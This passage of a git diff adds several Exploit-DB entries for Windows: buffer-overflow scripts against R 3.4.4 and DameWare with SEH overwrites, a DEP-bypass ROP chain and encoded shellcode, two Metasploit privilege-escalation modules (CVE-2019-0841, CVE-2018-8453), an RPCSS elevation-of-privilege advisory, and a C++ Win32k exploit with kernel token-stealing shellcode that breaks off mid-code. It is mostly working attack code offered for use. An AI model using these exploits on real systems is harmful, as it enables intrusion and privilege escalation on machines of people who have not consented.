+"\x69\x6f\x78\x55\x61\x78\x35\x33\x30\x6d\x51\x74\x57\x70" +
+"\x6b\x39\x4d\x33\x43\x67\x31\x47\x36\x37\x66\x51\x69\x66" +
+"\x71\x7a\x75\x42\x32\x79\x62\x76\x59\x72\x69\x6d\x52\x46" +
+"\x4b\x77\x51\x54\x31\x34\x65\x6c\x77\x71\x55\x51\x6c\x4d" +
+"\x30\x44\x74\x64\x56\x70\x49\x56\x57\x70\x53\x74\x72\x74" +
+"\x32\x70\x42\x76\x50\x56\x70\x56\x51\x56\x32\x76\x42\x6e" +
+"\x66\x36\x33\x66\x73\x63\x66\x36\x45\x38\x64\x39\x58\x4c" +
+"\x55\x6f\x4c\x46\x79\x6f\x79\x45\x6e\x69\x69\x70\x42\x6e" +
+"\x61\x46\x77\x36\x49\x6f\x30\x30\x35\x38\x45\x58\x4c\x47" +
+"\x45\x4d\x51\x70\x79\x6f\x38\x55\x4d\x6b\x4b\x50\x65\x4d" +
+"\x57\x5a\x55\x5a\x73\x58\x49\x36\x4c\x55\x6d\x6d\x4d\x4d" +
+"\x59\x6f\x6a\x75\x77\x4c\x64\x46\x73\x4c\x77\x7a\x4b\x30" +
+"\x59\x6b\x59\x70\x50\x75\x33\x35\x6f\x4b\x61\x57\x46\x73" +
+"\x62\x52\x70\x6f\x61\x7a\x45\x50\x33\x63\x69\x6f\x78\x55" +
+"\x41\x41")
+
+
+#74302E3F  comctl32.DLL
+buffer = "A"*256 + "\x3f\x2e\x30\x74" + "\x90"*10 + shellcode + "C"*(260-256-4-10)
+file.write(buffer)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/47122.py b/exploits/windows/local/47122.py
new file mode 100755
index 000000000..46a1f479a
--- /dev/null
+++ b/exploits/windows/local/47122.py
@@ -0,0 +1,82 @@
+#!/usr/bin/python
+# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow  SEH(DEP/ASLR Bypass)
+# Date: 2019-07-15
+# Exploit Author: blackleitus
+# Vendor Homepage: https://www.r-project.org/
+# Tested on: Windows 10 Home Single Language 64-bit
+# Social: https://twitter.com/blackleitus
+# Website: https://skybulk.github.io/
+# discovered by: bzyo
+
+
+# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
+import struct 
+
+outfile = 'payload.txt'
+
+def create_rop_chain():
+    rop_gadgets = [
+       0x6c998f58,   # POP EAX # RETN [R.dll] 
+       0x6379973c,   # ptr to &VirtualProtect() [IAT methods.dll]
+       0x6fee2984,   # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll] 
+       0x6ca1ba76,   # XCHG EAX,ESI # RETN [R.dll] 
+       0x64c45cb8,   # POP ECX # RETN    ** [methods.dll] **   |   {PAGE_EXECUTE_READ}
+       0x64c46010,   # &Writable location [methods.dll]
+       0x6cacc7e2,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0xffffffc0,   # Value to negate, will become 0x00000040
+       0x7139c7ba,   # NEG EAX # RETN    ** [stats.dll] **   |   {PAGE_EXECUTE_READ}
+       0x6ca3485a,   # XCHG EAX,EDX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0x7135a862,   # POP EAX # RETN    ** [stats.dll] **   |   {PAGE_EXECUTE_READ}
+       0xfffffdff,   # Value to negate, will become 0x00000201
+       0x6e7d41ca,   # NEG EAX # RETN    ** [utils.dll] **   |   {PAGE_EXECUTE_READ}
+       0x63742597,   # XCHG EAX,EBX # RETN    ** [Rgraphapp.dll] **   |   {PAGE_EXECUTE_READ}
+       0x6cbef3c0,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0x41414141,   # Filler (compensate)
+       0x6c9b1de7,   # POP EBP # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0x6ca2a9bd,   # & jmp esp [R.dll]
+       0x6cbebfa6,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0x90909090,   # nop
+       0x6ca00e93,   # POP EDI # RETN [R.dll] 
+       0x6375fe5c,   # RETN (ROP NOP) [Rgraphapp.dll]
+       0x6ff1b7bb,   # PUSHAD # RETN [grDevices.dll]
+    ]
+
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+junk = "A" * 1016
+
+seh = struct.pack("<L", 0x6cb5f812) # 0x6cb5f812 : {pivot 2988 / 0xbac} :  # ADD ESP,0B9C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+
+# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x09\x0a\x0d' cmd=calc.exe exitfunc=thread -f python
+
+nops = struct.pack("<L", 0x6cacc7e3) * 30
+
+shellcode =  ""
+shellcode += "\x90" * 20
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+padding = "D" * (8000-1016-4-30-len(rop_chain)-len(shellcode))
+
+payload = junk + seh + nops + rop_chain + shellcode + padding
+
+with open(outfile, 'w') as file:
+  file.write(payload)
+print "payload File Created\n"
\ No newline at end of file
diff --git a/exploits/windows/local/47126.py b/exploits/windows/local/47126.py
new file mode 100755
index 000000000..8a6dfbacc
--- /dev/null
+++ b/exploits/windows/local/47126.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python
+# Author: Xavi Beltran
+# Date: 11/07/2019
+# Description:
+#           SEH based Buffer Overflow
+#			DameWare Remote Support V. 12.0.0.509
+#			CVE-2018-12897
+
+# Contact: xavibeltran@protonmail.com
+# Webpage: https://xavibel.com
+# Tested on: Windows XP SP3 ESP
+
+# Credit for Adam Jeffreys from Nettitude! :)
+
+# Usage:
+#			Right click on a host >> AMT >> AMT Settings dialog
+#			Mark "Use SOCKS proxy" box
+#			Paste the string in the Host field
+
+junk  = "\x41" * 1672
+
+# Unicode compatible padding
+nseh = "\x61\x43"
+
+# 007A007B - POP POP RET
+seh = "\x7B\x7A"
+
+align  = ""
+align += "\x05\x20\x11"       # add eax,0x11002000
+align += "\x71"               # Venetian Padding
+align += "\x2d\x19\x11"       # sub eax,0x11001900
+align += "\x71"               # Venetian Padding
+align += "\x50"               # push eax
+align += "\x71"               # Venetian Padding
+align += "\xC3"               # RETN
+
+padding = "\x41" * 11
+
+junk2 = "\x41" * 870
+junk3 = "\x41" * 2014
+
+# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
+# ./alpha2 eax --unicode --uppercase < shellcode.raw
+# 508 bytes
+shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA"
+
+
+crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3
+
+print(crash)
\ No newline at end of file
diff --git a/exploits/windows/local/47128.rb b/exploits/windows/local/47128.rb
new file mode 100755
index 000000000..7d28ec2c7
--- /dev/null
+++ b/exploits/windows/local/47128.rb
@@ -0,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::FileInfo
+  include Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AppXSvc Hard Link Privilege Escalation',
+      'Description'    => %q(
+        There exists a privilege escalation vulnerability for
+        Windows 10 builds prior to build 17763. Due to the AppXSvc's
+        improper handling of hard links, a user can gain full
+        privileges over a SYSTEM-owned file. The user can then utilize
+        the new file to execute code as SYSTEM.
+
+        This module employs a technique using the Diagnostics Hub Standard
+        Collector Service (DiagHub) which was discovered by James Forshaw to
+        load and execute a DLL as SYSTEM.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nabeel Ahmed',      # Vulnerability discovery and PoC
+        'James Forshaw',     # Code creating hard links and communicating with DiagHub service
+        'Shelby Pace'        # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-0841' ],
+          [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
+          [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
+        ],
+      'Targets'        =>
+        [
+          [ 'Windows 10', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => '2019-04-09',
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def check
+    return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i
+
+    path = expand_path('%WINDIR%\\system32\\win32k.sys')
+    major, minor, build, revision, brand = file_version(path)
+    return CheckCode::Appears if build < 17763
+
+    CheckCode::Detected
+  end
+
+  def upload_file(file_name, file_path)
+    contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
+    write_file(file_path, contents)
+    register_file_for_cleanup(file_path)
+  rescue
+    fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
+  end
+
+  def init_process
+    print_status("Attempting to launch Microsoft Edge minimized.")
+    cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30)
+  end
+
+  def mk_hard_link(src, target, link_exe)
+    out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
+
+    return (out && out.include?('Done'))
+  end
+
+  def write_payload
+    print_status('Writing the payload to disk')
+    code = generate_payload_dll
+    @original_data = read_file(@rtf_path)
+    write_file(@rtf_path, code)
+  end
+
+  def exploit
+    vuln_status = check
+    fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown
+
+    fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?
+    cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"")
+    dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat")
+    fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)
+
+    if session.arch == ARCH_X86
+      exe_name = 'CVE-2019-0841_x86.exe'
+      f_name = 'diaghub_load_x86.exe'
+    elsif session.arch == ARCH_X64
+      exe_name = 'CVE-2019-0841_x64.exe'
+      f_name = 'diaghub_load_x64.exe'
+    end
+    link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
+    upload_file(exe_name, link_file_name)
+
+    @rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
+    fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
+    print_good('Successfully created hard link')
+    init_process
+    cmd_exec("taskkill /F /IM MicrosoftEdge.exe")
+
+    write_payload
+    diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
+    upload_file(f_name, diaghub_path)
+    cmd = "\"#{diaghub_path}\" \"license.rtf\""
+    cmd_exec(cmd)
+  end
+
+  def cleanup
+    folder_path = expand_path("%TEMP%\\etw")
+    dir_rm(folder_path)
+
+    write_file(@rtf_path, @original_data)
+    super
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47134.rb b/exploits/windows/local/47134.rb
new file mode 100755
index 000000000..12d15420e
--- /dev/null
+++ b/exploits/windows/local/47134.rb
@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+    'Name'            => 'Windows NtUserSetWindowFNID Win32k User Callback',
+    'Description'     => %q{
+        An elevation of privilege vulnerability exists in Windows when the Win32k component
+        fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability."
+        This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows
+        Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,
+        Windows 10, Windows 10 Servers.
+
+        This module is tested against Windows 10 v1703 x86.
+      },
+    'License'         => MSF_LICENSE,
+    'Author'          => [
+        'ze0r',           # Exploit analysis and PoC
+        'Kaspersky Lab',  # Vulnerability discovery/detection
+        'Jacob Robles'    # Metasploit module
+      ],
+    'Platform'        => 'win',
+    'Arch'            => ARCH_X86,
+    'SessionTypes'    => [ 'meterpreter' ],
+    'DefaultOptions'  => {
+        'EXITFUNC'    => 'thread'
+      },
+    'Targets'         => [
+        [ 'Windows 10 v1703 (Build 15063) x86', {
+            'UniqueProcessIdOffset' => 180,
+            'TokenOffset' => 252,
+            'Version' => 'Windows 10 (Build 15063)'
+          }
+        ]
+      ],
+    'References'      => [
+        ['CVE', '2018-8453'],
+        ['URL', 'https://github.com/ze0r/cve-2018-8453-exp'],
+        ['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'],
+        ['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'],
+        ['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'],
+        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453']
+      ],
+    'Notes' => {
+        'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
+        'Stability'   => [CRASH_OS_RESTARTS]
+      },
+    'DisclosureDate'  => '2018-10-09',
+    'DefaultTarget'   => 0
+    ))
+  end
+
+  def target_info
+    fail_with(Failure::None, 'Session is already elevated') if is_system?
+
+    unless sysinfo['OS'].start_with?(target['Version']) && sysinfo['Architecture'] == 'x86'
+      fail_with(Failure::NoTarget, 'Target is not compatible with exploit')
+    end
+  end
+
+  def write_file_to_target(fname, data)
+    tempdir = session.sys.config.getenv('TEMP')
+    file_loc = "#{tempdir}\\#{fname}"
+    vprint_warning("Attempting to write #{fname} to #{tempdir}")
+    write_file(file_loc, data)
+    vprint_good("#{fname} written")
+    file_loc
+  rescue Rex::Post::Meterpreter::RequestError => e
+    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
+  end
+
+  def exploit
+    target_info
+    exe_name = 'CVE-2018-8453.exe'
+    exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name)
+    vprint_status("Reading payload from file #{exe_path}")
+    raw = File.read(exe_path)
+
+    tmp_exe = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
+    vprint_status("Uploading exploit exe as: #{tmp_exe}")
+    exe_rpath = write_file_to_target(tmp_exe, raw)
+    register_file_for_cleanup(exe_rpath)
+
+    tmp_payload = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
+    payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)
+    vprint_status("Uploading payload #{tmp_payload}")
+    register_file_for_cleanup(payload_rpath)
+
+    command = "\"#{exe_rpath}\" \"#{payload_rpath}\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}"
+
+    vprint_status("Executing command: #{command}")
+    session.sys.process.execute(command, nil, {'Hidden' => false})
+    print_good('Exploit finished, wait for privileged payload execution to complete.')
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47135.txt b/exploits/windows/local/47135.txt
new file mode 100644
index 000000000..e6b69e6ba
--- /dev/null
+++ b/exploits/windows/local/47135.txt
@@ -0,0 +1,40 @@
+Windows: RPCSS Activation Kernel Security Callback EoP
+Platform: Windows 10 1903/1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The RPCSS Activation Kernel RPC server’s security callback can be bypassed resulting in EoP.
+
+Description:
+
+The RPCSS service is split into two components, RPCSS which runs as a low-privileged service account and the DCOM launch service which runs as SYSTEM and is responsible for creating new COM processes. Communication between the two services is over an RPC service named Activation Kernel (actkernel). When RPCSS receives a DCOM activation request it will pass that request on to the actkernel service to create new processes. 
+
+The actkernel RPC service implements various privileged operations, therefore it shouldn’t be callable from a normal user account. However the service must know who made the activation request to RPCSS. This is acheived by RPCSS impersonating the activator while making the RPC request to actkernel which means the ALPC port used by actkernel must be accessible by any process capable of activating a DCOM object, including AC and LPAC. To limit the call to only RPCSS the service implements a security callback on the RPC server which checks the caller process ID the RPCSS service, this should block arbitrary users on the system calling the service.
+
+Unfortunately there’s a flaw in this design, RPC defaults to caching the results on these security checks and actkernel doesn’t disable this feature. What this means is once a call is made to actkernel from RPCSS with a user’s token the security result is cached. Now that same user can access actkernel directly as the security callback will not be made and the PID will not be checked. 
+
+The caching is done primarily on the token’s modified ID, which doesn’t change as often as you’d expect including across ALPC impersonation. As long as the user has made some activation request (such as creating an OOP COM server) then the result is cached and the process can access privileged operations.
+
+Looking at what the service exposes an AC sandbox escape might be the best approach. For example the service exposes PrivGetPsmToken which will set an arbitrary SYSAPPID value to a token and return it to the caller. If done from an AC this token is still an AC token in the original package, but with an arbitrary SYSAPPID set which means that security checks which rely on that value can be bypassed. As the AC sid isn’t changed this means it can be impersonated by the caller. This could allow sandbox escape via Browser Broker or Desktop Broker by pretending to be Edge or a side-loaded application.
+
+Fixing wise if performance is acceptable then setting the RPC_IF_SEC_NO_CACHE flag on the interface registration should ensure the security callback is always made. You’d probably want to do a search for similar interfaces on Windows. Actkernel might be special in doing a PID check and allowing arbitrary callers via another route but I can’t be sure it’s the only one.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will use the vulnerability to get a token with an arbitrary SYSAPPID. It first respawns the PoC as the calculator AC, then gets a token for MicrosoftEdge. It doesn’t attempt to escape the sandbox, but I’m confident it’d be possible to achieve.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC. 
+3) The PoC should print the subkeys of the SAM hive.
+
+Expected Result:
+Accessing the actkernel RPC service should fail with an RPC fault.
+
+Observed Result:
+The actkernel RPC service grants access
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47135.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47176.cpp b/exploits/windows/local/47176.cpp
new file mode 100644
index 000000000..8371eb6b8
--- /dev/null
+++ b/exploits/windows/local/47176.cpp
@@ -0,0 +1,377 @@
+#include <Windows.h>
+#include <iostream>
+
+/*
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47176.zip
+*/
+
+/* PREPROCESSOR DEFINITIONS */
+#define MN_SELECTITEM 0x1E5
+#define MN_SELECTFIRSTVALIDITEM 0x1E7
+#define MN_OPENHIERARCHY 0x01E3
+#define MN_CANCELMENUS 0x1E6
+#define MN_BUTTONDOWN 0x1ed
+#define WM_EX_TRIGGER 0x6789
+#define NtCurrentProcess() (HANDLE)-1
+#define NtCurrentThread()  (HANDLE)-1
+#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
+#define TYPE_WINDOW 1
+
+/* GLOBAL VARIABLES */
+static BOOL		hWindowHuntDestroy = FALSE;
+static BOOL		bEnterEvent = FALSE;
+static BOOL		success = FALSE;
+static HMENU	hMenuList[3] = { 0 };
+static HWND		hWindowMain = NULL;
+static HWND		hWindowHunt = NULL;
+static HWND		hwndMenuList[3] = { 0 };
+static PVOID	MemAddr = (PVOID)1;
+static SIZE_T	MemSize = 0x1000;
+static DWORD	iCount = 0;
+static DWORD	release = 0;
+
+
+/* Structure definition of win32k!tagWND returned by xxHMValidateHandle */
+typedef struct _HEAD {
+	HANDLE  h;
+	DWORD   cLockObj;
+} HEAD, *PHEAD;
+
+typedef struct _THROBJHEAD {
+	HEAD    head;
+	PVOID   pti;
+} THROBJHEAD, *PTHROBJHEAD;
+
+typedef struct _DESKHEAD {
+	PVOID   rpdesk;
+	PBYTE   pSelf;
+} DESKHEAD, *PDESKHEAD;
+
+typedef struct _THRDESKHEAD {
+	THROBJHEAD  thread;
+	DESKHEAD    deskhead;
+} THRDESKHEAD, *PTHRDESKHEAD;
+
+/* Definition of xxHMValidateHandle */
+static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;
+
+/* Defintion of NtallocateVirtualMemory */
+typedef
+NTSTATUS
+(WINAPI *pfNtAllocateVirtualMemory) (
+	HANDLE       ProcessHandle,
+	PVOID       *BaseAddress,
+	ULONG_PTR    ZeroBits,
+	PSIZE_T      RegionSize,
+	ULONG        AllocationType,
+	ULONG        Protect
+	);
+pfNtAllocateVirtualMemory NtAllocateVirtualMemory = NULL;
+
+
+static
+VOID
+xxGetHMValidateHandle(VOID)
+{
+	HMODULE hModule = LoadLibraryA("USER32.DLL");
+	PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
+	PBYTE Address = NULL;
+	for (INT i = 0; i < 0x30; i++)
+	{
+		if (*(WORD *)(i + pfnIsMenu) != 0x02B2)
+		{
+			continue;
+		}
+		i += 2;
+		if (*(BYTE *)(i + pfnIsMenu) != 0xE8)
+		{
+			continue;
+		}
+		Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;
+		Address = Address + i + 5;
+		pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address;
+		break;
+	}
+}
+
+static
+PVOID
+xxHMValidateHandleEx(HWND hwnd)
+{
+	return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);
+}
+
+static
+PVOID
+xxHMValidateHandle(HWND hwnd)
+{
+	PVOID RetAddr = NULL;
+	if (!pfnHMValidateHandle)
+	{
+		xxGetHMValidateHandle();
+	}
+	if (pfnHMValidateHandle)
+	{
+		RetAddr = xxHMValidateHandleEx(hwnd);
+	}
+	return RetAddr;
+}
+
+static
+BOOL
+xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra, WNDPROC pfnProc = DefWindowProcW)
+{
+	WNDCLASSEXW wc = { 0 };
+	wc.cbSize = sizeof(WNDCLASSEXW);
+	wc.lpfnWndProc = pfnProc;
+	wc.cbWndExtra = cbWndExtra;
+	wc.hInstance = GetModuleHandleA(NULL);
+	wc.lpszMenuName = NULL;
+	wc.lpszClassName = lpszClassName;
+	return RegisterClassExW(&wc);
+}
+
+static
+HWND
+xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle, HINSTANCE hInstance = NULL, HWND hwndParent = NULL)
+{
+	return CreateWindowExW(dwExStyle,
+		lpszClassName,
+		NULL,
+		dwStyle,
+		0,
+		0,
+		1,
+		1,
+		hwndParent,
+		NULL,
+		hInstance,
+		NULL);
+}
+
+static
+LRESULT
+CALLBACK
+xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
+{
+	tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
+
+	if (cwp->message == WM_NCCREATE && bEnterEvent && hwndMenuList[release] && !hwndMenuList[release+1])
+	{
+		printf("Sending the MN_CANCELMENUS message\n");
+		SendMessage(hwndMenuList[release], MN_CANCELMENUS, 0, 0);
+		bEnterEvent = FALSE;
+	}
+	return CallNextHookEx(0, code, wParam, lParam);
+}
+
+
+static
+VOID
+CALLBACK
+xxWindowEventProc(
+	HWINEVENTHOOK hWinEventHook,
+	DWORD         event,
+	HWND          hwnd,
+	LONG          idObject,
+	LONG          idChild,
+	DWORD         idEventThread,
+	DWORD         dwmsEventTime
+)
+{
+	UNREFERENCED_PARAMETER(hWinEventHook);
+	UNREFERENCED_PARAMETER(event);
+	UNREFERENCED_PARAMETER(idObject);
+	UNREFERENCED_PARAMETER(idChild);
+	UNREFERENCED_PARAMETER(idEventThread);
+	UNREFERENCED_PARAMETER(dwmsEventTime);
+
+	bEnterEvent = TRUE;
+	if (iCount < ARRAYSIZE(hwndMenuList))
+	{
+		hwndMenuList[iCount] = hwnd;
+		iCount++;
+	}
+	SendMessageW(hwnd, MN_SELECTITEM, 0, 0);
+	SendMessageW(hwnd, MN_SELECTFIRSTVALIDITEM, 0, 0);
+	PostMessageW(hwnd, MN_OPENHIERARCHY, 0, 0);
+}
+
+__declspec(noinline) int Shellcode()
+{
+	__asm {
+		xor eax, eax // Set EAX to 0.
+		mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PcrbData.
+											 // _KTHREAD is located at FS:[0x124]
+		mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process
+		mov ecx, eax // Copy current process _EPROCESS structure
+		mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4
+		SearchSystemPID:
+			mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink
+			sub eax, 0B8h
+			cmp[eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId
+			jne SearchSystemPID
+			mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token
+			mov[ecx + 0xF8], edx // Assign SYSTEM process token.
+	}
+}
+
+static
+LRESULT
+WINAPI
+xxMainWindowProc(
+	_In_ HWND   hwnd,
+	_In_ UINT   msg,
+	_In_ WPARAM wParam,
+	_In_ LPARAM lParam
+)
+{
+	if (msg == 0x1234)
+	{
+		WORD um = 0;
+		__asm
+		{
+			// Grab the value of the CS register and
+			// save it into the variable UM.
+			//int 3
+			mov ax, cs
+			mov um, ax
+		}
+		// If UM is 0x1B, this function is executing in usermode
+		// code and something went wrong. Therefore output a message that
+		// the exploit didn't succeed and bail.
+		if (um == 0x1b)
+		{
+			// USER MODE
+			printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");
+			ExitProcess(-1); // Bail as if this code is hit either the target isn't 
+							 // vulnerable or something is wrong with the exploit.
+		}
+		else
+		{
+			success = TRUE; // Set the success flag to indicate the sprayCallback()
+							// window procedure is running as SYSTEM.
+			Shellcode(); // Call the Shellcode() function to perform the token stealing and
+						 // to remove the Job object on the Chrome renderer process.
+		}
+	}
+	return DefWindowProcW(hwnd, msg, wParam, lParam);
+}
+
+int main()
+{
+	/* Creating the menu */
+	for (int i = 0; i < 3; i++)
+		hMenuList[i] = CreateMenu();
+
+	/* Appending the menus along with the item */
+	for (int i = 0; i < 3; i++)
+	{
+		AppendMenuA(hMenuList[i], MF_POPUP | MF_MOUSESELECT, (UINT_PTR)hMenuList[i + 1], "item");
+	}
+	AppendMenuA(hMenuList[2], MF_POPUP | MF_MOUSESELECT, (UINT_PTR)0, "item");
+
+	/* Creating a main window class */
+	xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000, DefWindowProc);
+	hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN",
+		WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST,
+		WS_VISIBLE,
